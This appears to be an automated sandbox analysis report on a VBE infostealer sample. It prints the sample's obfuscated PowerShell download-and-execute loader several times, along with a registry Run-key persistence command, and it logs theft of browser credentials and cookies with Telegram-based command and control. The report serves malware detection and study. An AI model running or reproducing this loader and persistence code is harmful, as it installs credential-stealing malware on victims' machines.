S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $horrify; function uprouse15($fastigiate){$bovate=4;do{$cataracted+=$fastigiate[$bovate];$bovate+=5;$preciosities=format-list} until(!$fastigiate[$bovate])$cataracted}function testvrktjer($pericemental){ .($unplutocratically) ($pericemental)}$tagdkker=uprouse15 ' husnudboe flltregu.,lnsw';$tagdkker+=uprouse15 'tersegrabbno.acc.cklhjteisupre andnrenlt';$rootfast=uprouse15 'i bam srsoawonzu.deia.rel enslkonta rio/';$bovatendskudsstning=uprouse15 'in ltsekulundesprec1 r c2';$matricides=' iko[h isnperie prot til.e ems yane ugtrhjerv choiaftecd,taecoagpchifoservilevenskalteudampolyagastncardasi kg ap.ebrutrbuli]beds: tan:k losfestesquic avpu bomrid oi coptrecoyknhjpha erra,eo vitt rano ntcsu soterslhepa=opsl$kns.bde.oobankvjow a hygtfo se kltnentodafs,sre.ukleftuformdoranssquassorttrealngalligiv nmicrg';$rootfast+=uprouse15 ' bri5ad i.atro0st.k for(hovewselvic rcnnin.dlogaoamniwtri smetr klatn arctgurg bue1 hri0po d.ki o0 in;bo d vbniwuntui counperi6capo4sa e;va p s,rix wa6sca 4mave;peer skar nurv ko:tra 1 cry3over4town.fors0men.)edel sumgbutielem c udskdiaroalcm/ van2ti s0 ,be1,etr0refl0gang1gl t0 syt1 sub alcf spoiunder ab ety efdobboh.arxinbo/semi1si.u3prem4,oni.m.zu0';$hydroida=uprouse15 'schiunonfs biberivermeta-inhaaartsgunswegroon rect';$efterabelserne174=uprouse15 'polyhkravtstyrtafrep sp.smarx:f re/regn/ josotagdo g drstreime.og.anaiseminin xarudslbleru ,edsconcemonadtyro. 
vivcdagpopl dm cre/i.dtln neodemirfo sdpalo/sokkrgenmesarci ,ramudmea pl gfartiarmin agtemoi..bovnplab raktim';$smreplsen78=uprouse15 ' apo>';$unplutocratically=uprouse15 'staki cofesvovx';$fodboldes='sygevarsler';$barakkens='\sammenbinder.moe';testvrktjer (uprouse15 ' pri$hjergveltlmonook,rsbudsea stelasja:lo ta.forntffeng lvu astl orao ilispladhuj = elg$faguesinindetav ase:idenahjfopk.shp un,dze,hatommtstilat an+dyka$ca bb ysia angrpremab nekantiksl nebu.ln unss');testvrktjer (uprouse15 ' gho$wildgentrlmi eo saib venasmaald.lu:sni.sradipphoni geasd moemu ipunsul t tiischge,trtaish1 fri5 dfo=unod$ ud ebaudfcongtb,stetaklrenspa norb anae hveludfas ynteimp r lusnwasheisil1 opt7fo,e4vi a.knalsi,tep epilb,lliancytkkke(tant$syntsurinm s.cr bate ko,p agbl seasrygme miln ch.7triu8pa i)');testvrktjer (uprouse15 $matricides);$efterabelserne174=$spisepligt15[0];$bodgery=(uprouse15 ' inq$om,igjacklcacooblisbudkla uinlfo.s:ani uludvnudhumpel,agastsacaltpasse inrsp cfs.aau a,klregn=prosnkoekeamerwafso-ho oopeptblangj cryemat ctelet co to lsrec yl ges unutskygesuprm ork. rip$fri tcoc a ewagbrdrdalulk tafk posepne r');testvrktjer ($bodgery);testvrktjer (uprouse15 'tyfo$mou uar,inintembeviam nisrod,tkimbetimerungrf eeuvitalover.boflhseasem cran.grdtilgeskibrche.sd el[ unf$ murh,hefybadidnov rm xiojo sireped ek,ahome]mic =dupl$ls,erudsko aaodhaitansafskinatrefsmoist');$saaede=uprouse15 ' for$ brautegnn benmn nva .teshandt,edre ensru frfbestu.xillbjrg.bai
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $horrify; function uprouse15($fastigiate){$bovate=4;do{$cataracted+=$fastigiate[$bovate];$bovate+=5;$preciosities=format-list} until(!$fastigiate[$bovate])$cataracted}function testvrktjer($pericemental){ .($unplutocratically) ($pericemental)}$tagdkker=uprouse15 ' husnudboe flltregu.,lnsw';$tagdkker+=uprouse15 'tersegrabbno.acc.cklhjteisupre andnrenlt';$rootfast=uprouse15 'i bam srsoawonzu.deia.rel enslkonta rio/';$bovatendskudsstning=uprouse15 'in ltsekulundesprec1 r c2';$matricides=' iko[h isnperie prot til.e ems yane ugtrhjerv choiaftecd,taecoagpchifoservilevenskalteudampolyagastncardasi kg ap.ebrutrbuli]beds: tan:k losfestesquic avpu bomrid oi coptrecoyknhjpha erra,eo vitt rano ntcsu soterslhepa=opsl$kns.bde.oobankvjow a hygtfo se kltnentodafs,sre.ukleftuformdoranssquassorttrealngalligiv nmicrg';$rootfast+=uprouse15 ' bri5ad i.atro0st.k for(hovewselvic rcnnin.dlogaoamniwtri smetr klatn arctgurg bue1 hri0po d.ki o0 in;bo d vbniwuntui counperi6capo4sa e;va p s,rix wa6sca 4mave;peer skar nurv ko:tra 1 cry3over4town.fors0men.)edel sumgbutielem c udskdiaroalcm/ van2ti s0 ,be1,etr0refl0gang1gl t0 syt1 sub alcf spoiunder ab ety efdobboh.arxinbo/semi1si.u3prem4,oni.m.zu0';$hydroida=uprouse15 'schiunonfs biberivermeta-inhaaartsgunswegroon rect';$efterabelserne174=uprouse15 'polyhkravtstyrtafrep sp.smarx:f re/regn/ josotagdo g drstreime.og.anaiseminin xarudslbleru ,edsconcemonadtyro. 
vivcdagpopl dm cre/i.dtln neodemirfo sdpalo/sokkrgenmesarci ,ramudmea pl gfartiarmin agtemoi..bovnplab raktim';$smreplsen78=uprouse15 ' apo>';$unplutocratically=uprouse15 'staki cofesvovx';$fodboldes='sygevarsler';$barakkens='\sammenbinder.moe';testvrktjer (uprouse15 ' pri$hjergveltlmonook,rsbudsea stelasja:lo ta.forntffeng lvu astl orao ilispladhuj = elg$faguesinindetav ase:idenahjfopk.shp un,dze,hatommtstilat an+dyka$ca bb ysia angrpremab nekantiksl nebu.ln unss');testvrktjer (uprouse15 ' gho$wildgentrlmi eo saib venasmaald.lu:sni.sradipphoni geasd moemu ipunsul t tiischge,trtaish1 fri5 dfo=unod$ ud ebaudfcongtb,stetaklrenspa norb anae hveludfas ynteimp r lusnwasheisil1 opt7fo,e4vi a.knalsi,tep epilb,lliancytkkke(tant$syntsurinm s.cr bate ko,p agbl seasrygme miln ch.7triu8pa i)');testvrktjer (uprouse15 $matricides);$efterabelserne174=$spisepligt15[0];$bodgery=(uprouse15 ' inq$om,igjacklcacooblisbudkla uinlfo.s:ani uludvnudhumpel,agastsacaltpasse inrsp cfs.aau a,klregn=prosnkoekeamerwafso-ho oopeptblangj cryemat ctelet co to lsrec yl ges unutskygesuprm ork. rip$fri tcoc a ewagbrdrdalulk tafk posepne r');testvrktjer ($bodgery);testvrktjer (uprouse15 'tyfo$mou uar,inintembeviam nisrod,tkimbetimerungrf eeuvitalover.boflhseasem cran.grdtilgeskibrche.sd el[ unf$ murh,hefybadidnov rm xiojo sireped ek,ahome]mic =dupl$ls,erudsko aaodhaitansafskinatrefsmoist');$saaede=uprouse15 ' for$ brautegnn benmn nva .teshandt,edre ensru frfbestu.xillbjrg.bai
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "litteraturlistes" /t reg_expand_sz /d "%hochelaga% -windowstyle 1 $saltires=(gi 'hkcu:\software\wormseeds\').getvalue('engangsforeteelsens184');%hochelaga% ($saltires)"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $horrify; function uprouse15($fastigiate){$bovate=4;do{$cataracted+=$fastigiate[$bovate];$bovate+=5;$preciosities=format-list} until(!$fastigiate[$bovate])$cataracted}function testvrktjer($pericemental){ .($unplutocratically) ($pericemental)}$tagdkker=uprouse15 ' husnudboe flltregu.,lnsw';$tagdkker+=uprouse15 'tersegrabbno.acc.cklhjteisupre andnrenlt';$rootfast=uprouse15 'i bam srsoawonzu.deia.rel enslkonta rio/';$bovatendskudsstning=uprouse15 'in ltsekulundesprec1 r c2';$matricides=' iko[h isnperie prot til.e ems yane ugtrhjerv choiaftecd,taecoagpchifoservilevenskalteudampolyagastncardasi kg ap.ebrutrbuli]beds: tan:k losfestesquic avpu bomrid oi coptrecoyknhjpha erra,eo vitt rano ntcsu soterslhepa=opsl$kns.bde.oobankvjow a hygtfo se kltnentodafs,sre.ukleftuformdoranssquassorttrealngalligiv nmicrg';$rootfast+=uprouse15 ' bri5ad i.atro0st.k for(hovewselvic rcnnin.dlogaoamniwtri smetr klatn arctgurg bue1 hri0po d.ki o0 in;bo d vbniwuntui counperi6capo4sa e;va p s,rix wa6sca 4mave;peer skar nurv ko:tra 1 cry3over4town.fors0men.)edel sumgbutielem c udskdiaroalcm/ van2ti s0 ,be1,etr0refl0gang1gl t0 syt1 sub alcf spoiunder ab ety efdobboh.arxinbo/semi1si.u3prem4,oni.m.zu0';$hydroida=uprouse15 'schiunonfs biberivermeta-inhaaartsgunswegroon rect';$efterabelserne174=uprouse15 'polyhkravtstyrtafrep sp.smarx:f re/regn/ josotagdo g drstreime.og.anaiseminin xarudslbleru ,edsconcemonadtyro. 
vivcdagpopl dm cre/i.dtln neodemirfo sdpalo/sokkrgenmesarci ,ramudmea pl gfartiarmin agtemoi..bovnplab raktim';$smreplsen78=uprouse15 ' apo>';$unplutocratically=uprouse15 'staki cofesvovx';$fodboldes='sygevarsler';$barakkens='\sammenbinder.moe';testvrktjer (uprouse15 ' pri$hjergveltlmonook,rsbudsea stelasja:lo ta.forntffeng lvu astl orao ilispladhuj = elg$faguesinindetav ase:idenahjfopk.shp un,dze,hatommtstilat an+dyka$ca bb ysia angrpremab nekantiksl nebu.ln unss');testvrktjer (uprouse15 ' gho$wildgentrlmi eo saib venasmaald.lu:sni.sradipphoni geasd moemu ipunsul t tiischge,trtaish1 fri5 dfo=unod$ ud ebaudfcongtb,stetaklrenspa norb anae hveludfas ynteimp r lusnwasheisil1 opt7fo,e4vi a.knalsi,tep epilb,lliancytkkke(tant$syntsurinm s.cr bate ko,p agbl seasrygme miln ch.7triu8pa i)');testvrktjer (uprouse15 $matricides);$efterabelserne174=$spisepligt15[0];$bodgery=(uprouse15 ' inq$om,igjacklcacooblisbudkla uinlfo.s:ani uludvnudhumpel,agastsacaltpasse inrsp cfs.aau a,klregn=prosnkoekeamerwafso-ho oopeptblangj cryemat ctelet co to lsrec yl ges unutskygesuprm ork. rip$fri tcoc a ewagbrdrdalulk tafk posepne r');testvrktjer ($bodgery);testvrktjer (uprouse15 'tyfo$mou uar,inintembeviam nisrod,tkimbetimerungrf eeuvitalover.boflhseasem cran.grdtilgeskibrche.sd el[ unf$ murh,hefybadidnov rm xiojo sireped ek,ahome]mic =dupl$ls,erudsko aaodhaitansafskinatrefsmoist');$saaede=uprouse15 ' for$ brautegnn benmn nva .teshandt,edre ensru frfbestu.xillbjrg.bai
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "litteraturlistes" /t reg_expand_sz /d "%hochelaga% -windowstyle 1 $saltires=(gi 'hkcu:\software\wormseeds\').getvalue('engangsforeteelsens184');%hochelaga% ($saltires)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match  File source: 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: Process Memory Space: msiexec.exe PID: 5216, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: Yara match  File source: Process Memory Space: msiexec.exe PID: 5216, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match  File source: 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: Process Memory Space: msiexec.exe PID: 5216, type: MEMORYSTR
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 311 Process Injection | 1 Software Packing | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 11 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Behavior Graph ID: 1636427  Sample: 4500149631.vbe  Startdate: 12/03/2025  Architecture: WINDOWS  Score: 100
              Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
              Graph-level network: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains
              Process tree recovered from the graph:
              - powershell.exe: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
                - msiexec.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); network: api.telegram.org 149.154.167.220, 443, 49712, 49713 TELEGRAMRU United Kingdom; checkip.dyndns.com 158.101.44.242, 49695, 49698, 49700 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.80.1, 443, 49696, 49697 CLOUDFLARENETUS United States
                  - cmd.exe
                    - conhost.exe
                    - reg.exe
                - conhost.exe
              - wscript.exe: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); 2 other signatures
                - powershell.exe: Found suspicious powershell code related to unpacking or dynamic code loading; network: ooriginalused.com 185.159.153.17, 443, 49682, 49694 SERVERPARSIR Iran (ISLAMIC Republic Of)
                  - conhost.exe
                - WmiPrvSE.exe
